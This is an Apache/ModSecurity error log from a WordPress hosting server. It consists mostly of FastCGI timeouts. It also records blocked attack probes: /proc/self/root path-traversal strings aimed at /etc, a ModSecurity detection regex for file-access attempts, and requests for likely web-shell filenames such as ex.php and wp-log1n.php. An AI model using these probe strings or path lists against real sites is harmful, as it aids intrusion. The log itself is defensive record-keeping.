[Wed Mar 18 22:28:25.790225 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38118] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:28:37.091100 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.228.61:40272] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtRRQbLMZ6AikZjR9UEvwAAAAM"]
[Wed Mar 18 22:29:55.981919 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38228] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:31:32.057864 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38462] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:31:44.160695 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:53776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtSAEzinOy1jxa1j4dkhAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 22:32:07.133837 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38734] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:32:39.331672 2026] [proxy_fcgi:error] [pid 23798:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38850] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:33:16.105874 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38948] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:33:40.072394 2026] [proxy_fcgi:error] [pid 15051:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39128] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:34:27.857812 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39186] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:36:24.609839 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39284] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:36:59.349852 2026] [proxy_fcgi:error] [pid 27403:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39662] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:37:37.762190 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39758] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:38:24.425831 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39872] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:39:08.397550 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.228.61:34416] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtTvMdf6f5d65gmYZQa1gAAAsE"]
[Wed Mar 18 22:39:30.957854 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39970] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:39:54.401851 2026] [proxy_fcgi:error] [pid 11816:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40144] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:41:24.677909 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40236] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:41:59.433852 2026] [proxy_fcgi:error] [pid 27403:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40460] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:43:13.855822 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.244.43:54138] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtUsEzinOy1jxa1j4dkjwAAAQ0"]
[Wed Mar 18 22:43:24.545824 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40500] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:44:06.905855 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40650] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:44:30.973859 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40722] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:44:56.127590 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40760] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:44:56.379430 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:42962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtVGPu8EFLIOrSqIptEwwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 22:46:31.234149 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40808] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:48:08.825928 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40986] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:48:16.309426 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.244.43:38244] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtV4AkwaGbbGflqUZBZIgAAAMs"]
[Wed Mar 18 22:48:38.765867 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41210] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:49:31.046009 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41248] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:49:57.150534 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41316] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:50:19.401442 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41476] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:51:18.073821 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41524] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:52:44.980856 2026] [proxy_fcgi:error] [pid 9800:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41632] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:53:16.148616 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41804] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:53:24.158494 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.244.43:52794] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtXFP-YZRR_7pZ7nDI4BAAAA84"]
[Wed Mar 18 22:53:38.878995 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42022] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:54:40.382563 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42094] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:55:54.582352 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42164] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:56:18.138205 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42504] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:57:45.057889 2026] [proxy_fcgi:error] [pid 9800:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42682] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:58:19.789832 2026] [proxy_fcgi:error] [pid 9333:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42902] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:58:44.405275 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43026] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:59:18.873954 2026] [proxy_fcgi:error] [pid 9530:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43068] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 22:59:56.047902 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] [client 179.188.53.243:43122] AH01067: Failed to read FastCGI header
[Wed Mar 18 22:59:56.047958 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (104)Connection reset by peer: [client 179.188.53.243:43122] AH01075: Error dispatching request to : 
[Wed Mar 18 23:00:27.039017 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43256] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:01:18.252558 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43314] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:01:41.289809 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43468] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:02:04.777984 2026] [proxy_fcgi:error] [pid 29882:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43538] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:02:33.149910 2026] [proxy_fcgi:error] [pid 15051:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43570] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:03:20.408202 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:48708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtZaOoXxyEfFpUF8f-7nwAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 23:03:25.317852 2026] [proxy_fcgi:error] [pid 9333:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43610] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:04:18.928682 2026] [proxy_fcgi:error] [pid 9530:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43720] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:04:56.101989 2026] [proxy_fcgi:error] [pid 9333:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43850] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:05:23.107159 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43938] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:06:23.125899 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44084] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:06:44.357844 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44310] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:07:06.902159 2026] [proxy_fcgi:error] [pid 29882:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44540] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:07:33.260278 2026] [proxy_fcgi:error] [pid 15051:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44582] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:07:59.539143 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44612] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:08:29.057853 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44802] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:09:24.610971 2026] [proxy_fcgi:error] [pid 9530:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44870] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:10:29.217778 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45030] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:10:54.695546 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45130] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:11:47.057854 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45232] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:12:44.453315 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45330] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:13:16.057838 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45434] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:13:50.077880 2026] [proxy_fcgi:error] [pid 15051:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45510] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:14:24.721905 2026] [proxy_fcgi:error] [pid 9530:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45748] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:15:29.421897 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45796] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:16:36.441784 2026] [proxy_fcgi:error] [pid 23798:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45892] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:17:44.870270 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45956] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:18:23.001871 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46154] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:19:01.265847 2026] [proxy_fcgi:error] [pid 15051:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46206] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:19:56.161778 2026] [proxy_fcgi:error] [pid 15051:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46250] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:20:27.515205 2026] [proxy_fcgi:error] [pid 23798:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46384] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:20:49.181863 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46748] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:21:11.689831 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46900] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:21:36.581965 2026] [proxy_fcgi:error] [pid 23798:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47016] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:22:44.917836 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47122] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:23:17.097808 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47334] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:23:39.689911 2026] [proxy_fcgi:error] [pid 9333:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47608] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:24:08.905921 2026] [proxy_fcgi:error] [pid 15051:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47698] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:24:34.354985 2026] [proxy_fcgi:error] [pid 15051:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47786] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:25:49.249889 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47958] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:26:37.687179 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48180] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:27:17.217438 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48376] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:27:43.329974 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48456] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:28:39.801920 2026] [proxy_fcgi:error] [pid 9333:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48500] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:29:44.993838 2026] [proxy_fcgi:error] [pid 15051:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48586] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:30:17.117851 2026] [proxy_fcgi:error] [pid 29882:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48702] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:30:56.149866 2026] [proxy_fcgi:error] [pid 9530:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48736] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:31:39.069838 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48800] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:32:51.370671 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48886] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:33:16.789884 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48976] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:33:38.073873 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49194] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:34:13.361987 2026] [proxy_fcgi:error] [pid 29882:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49270] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:34:47.637887 2026] [proxy_fcgi:error] [pid 15051:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49302] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:35:05.196292 2026] [access_compat:error] [pid 9800:tid 140411540502272] [client 80.97.160.132:58008] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/plugins/elementskit-lite/modules/header-footer/requests/ex.php, referer: https://bandeirantesbombas.com.br/wp-content/plugins/elementskit-lite/modules/header-footer/requests/ex.php
[Wed Mar 18 23:35:10.428098 2026] [access_compat:error] [pid 9800:tid 140411540502272] [client 80.97.160.132:58028] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/plugins/elementskit-lite/modules/header-footer/requests/radio.php, referer: https://bandeirantesbombas.com.br/wp-content/plugins/elementskit-lite/modules/header-footer/requests/radio.php
[Wed Mar 18 23:35:46.916203 2026] [:error] [pid 9333:tid 140411733534464] [client 74.7.228.61:58492] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abthAg_eYRmh974Uj6QJfwAAAoE"]
[Wed Mar 18 23:35:49.351322 2026] [:error] [pid 9333:tid 140411733534464] [client 74.7.244.43:44912] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abthBQ_eYRmh974Uj6QJhAAAAoE"]
[Wed Mar 18 23:35:58.839508 2026] [proxy_fcgi:error] [pid 9530:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49368] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:36:26.832641 2026] [access_compat:error] [pid 29882:tid 140411582465792] [client 80.97.160.132:32966] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ex.php, referer: https://bandeirantesbombas.com.br/ex.php
[Wed Mar 18 23:36:29.253903 2026] [access_compat:error] [pid 29882:tid 140411741927168] [client 80.97.160.132:32982] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/click.php, referer: https://bandeirantesbombas.com.br/click.php
[Wed Mar 18 23:36:30.907964 2026] [access_compat:error] [pid 29882:tid 140411582465792] [client 80.97.160.132:32988] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/radio.php, referer: https://bandeirantesbombas.com.br/radio.php
[Wed Mar 18 23:36:32.020474 2026] [access_compat:error] [pid 29882:tid 140411582465792] [client 80.97.160.132:32998] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/click.php, referer: https://bandeirantesbombas.com.br/click.php
[Wed Mar 18 23:36:38.386640 2026] [access_compat:error] [pid 14269:tid 140411691570944] [client 80.97.160.132:49070] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/inputs.php, referer: https://bandeirantesbombas.com.br/inputs.php
[Wed Mar 18 23:36:45.981830 2026] [proxy_fcgi:error] [pid 15826:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49498] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:37:08.077795 2026] [proxy_fcgi:error] [pid 9530:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49808] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:37:08.554096 2026] [access_compat:error] [pid 9530:tid 140411699963648] [client 80.97.160.132:36868] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-log1n.php, referer: https://bandeirantesbombas.com.br/wp-log1n.php
[Wed Mar 18 23:37:39.921975 2026] [proxy_fcgi:error] [pid 9530:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49912] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:38:11.345832 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50008] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:38:18.556345 2026] [access_compat:error] [pid 30077:tid 140411725141760] [client 80.97.160.132:33906] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/item.php, referer: https://bandeirantesbombas.com.br/item.php
[Wed Mar 18 23:38:28.163624 2026] [access_compat:error] [pid 23798:tid 140411641214720] [client 80.97.160.132:46462] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/ex.php, referer: http://bandeirantesbombas.com.br/wp-content/uploads/ex.php
[Wed Mar 18 23:39:03.407120 2026] [access_compat:error] [pid 9333:tid 140411733534464] [client 80.97.160.132:46474] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/radio.php, referer: http://bandeirantesbombas.com.br/wp-content/uploads/radio.php
[Wed Mar 18 23:39:19.082542 2026] [proxy_fcgi:error] [pid 29882:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50058] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 23:39:57.625985 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50134] AH01075: Error dispatching request to : (polling)
